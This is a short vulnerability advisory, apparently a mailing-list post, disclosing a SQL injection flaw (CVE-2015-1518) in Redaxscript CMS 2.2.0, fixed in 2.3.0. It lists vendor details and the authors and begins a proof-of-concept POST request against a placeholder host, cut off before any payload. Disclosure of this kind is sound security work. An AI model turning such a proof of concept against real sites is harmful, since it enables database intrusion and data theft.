Radexscript CMS 2.2.0 – SQL Injection vulnerability

Posted by ITAS Team on Feb 12

#Vulnerability title: Radexscript CMS 2.2.0 – SQL Injection vulnerability
#Vendor: http://redaxscript.com/
#Product: Radexscript CMS
#Software link: http://redaxscript.com/download/releases
#Affected version: Redaxscript 2.2.0
#Fixed version: Redaxscript 2.3.0
#CVE ID: CVE-2015-1518
#Author: Pham Kien Cuong (cuong.k.pham () itas vn) & ITAS Team (www.itas.vn)

:: PROOF OF CONCEPT ::

POST /redaxscript/ HTTP/1.1
Host: target.local
User-Agent:…

Leave a Reply